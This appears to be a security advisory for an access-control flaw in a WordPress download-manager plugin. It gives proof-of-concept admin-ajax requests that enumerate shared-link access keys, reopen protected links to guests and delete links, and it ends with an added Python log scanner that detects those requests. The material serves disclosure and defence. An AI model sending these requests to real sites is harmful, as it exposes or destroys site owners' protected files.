## https://sploitus.com/exploit?id=WPEX-ID:BC88AA10-B861-4426-8BCD-AB1B4A2214AB
With the Pro version installed, log in as an author, open the All Package page from the plugin (/wp-admin/edit.php?post_type=wpdmpro) and grab the nonce from the __edlnonce input.

Then open https://example.com/wp-admin/admin-ajax.php?__wpdm_getlinkdet=<NONCE>&action=wpdm_getlinkdet&linkid=1 and increment the linkid parameter to discover every access_key, along with the full URL to access the shared links.

If a link is protected, it can be updated the same way to change its settings and make it accessible to All Visitors (guest):

https://example.com/wp-admin/admin-ajax.php?__wpdm_updatelink=<NONCE>&action=wpdm_updatelink&ID=2&access%5Broles%5D%5B%5D=guest

Links can also be arbitrarily deleted: https://example.com/wp-admin/admin-ajax.php?__wpdm_deletelink=<NONCE>&action=wpdm_deletelink&linkid=1

Notes:
If an authenticated user has access to a shared asset URL, the nonce generated by the NONCE_KEY action will be displayed in them (via the __wpdm_addcomment for example).

If the Dashboard page from the plugin feature is enabled, then the nonce generated by the NONCE_KEY action will be displayed via the logout parameter, making the issues above exploitable by any authenticated user, such as subscribers. There might be other (and easier to reach) locations where the nonce is displayed as well.

The PoCs above are examples of what could be done; other attacks are possible (and could be chained depending on the blog to achieve higher goals) but have not been disclosed.
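For site owners, the three admin-ajax.php requests shown above leave a recognisable trail in web server access logs when they are sent as GET requests. The following is an added detection sketch, not code from the advisory or the plugin; the log lines are constructed, and the finding labels and the `ENUM_THRESHOLD` value are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

AJAX = "/wp-admin/admin-ajax.php"
# Constructed sample lines in combined log format (not from a real site).
SAMPLE_LOG = "\n".join(
    f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {AJAX}?{qs} HTTP/1.1" 200 64'
    for ip, qs in [
        ("203.0.113.7", "__wpdm_getlinkdet=NONCE&action=wpdm_getlinkdet&linkid=1"),
        ("203.0.113.7", "__wpdm_getlinkdet=NONCE&action=wpdm_getlinkdet&linkid=2"),
        ("203.0.113.7", "__wpdm_getlinkdet=NONCE&action=wpdm_getlinkdet&linkid=3"),
        ("203.0.113.7", "__wpdm_updatelink=NONCE&action=wpdm_updatelink&ID=2"
                        "&access%5Broles%5D%5B%5D=guest"),
        ("203.0.113.7", "__wpdm_deletelink=NONCE&action=wpdm_deletelink&linkid=1"),
        ("198.51.100.4", "__wpdm_getlinkdet=NONCE&action=wpdm_getlinkdet&linkid=5"),
        ("198.51.100.4", "action=heartbeat"),
    ]
)

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
ENUM_THRESHOLD = 3  # assumed: distinct linkid values per client before alerting


def scan(log_text, enum_threshold=ENUM_THRESHOLD):
    """Return a sorted list of (client_ip, finding) for the link actions."""
    findings = set()
    link_ids = defaultdict(set)  # client ip -> linkid values it requested
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(AJAX):
            continue
        q = parse_qs(url.query)  # decodes access%5Broles%5D%5B%5D as well
        action = q.get("action", [""])[0]
        if action == "wpdm_getlinkdet":
            link_ids[ip].update(q.get("linkid", []))
        elif action == "wpdm_updatelink" and "guest" in q.get("access[roles][]", []):
            findings.add((ip, "link opened to guest"))
        elif action == "wpdm_deletelink":
            findings.add((ip, "link deleted"))
    for ip, ids in link_ids.items():
        if len(ids) >= enum_threshold:
            findings.add((ip, "linkid enumeration"))
    return sorted(findings)
```

Access logs record only the query string, so the same actions sent in a POST body would need request-body logging (for example at a WAF) to be visible.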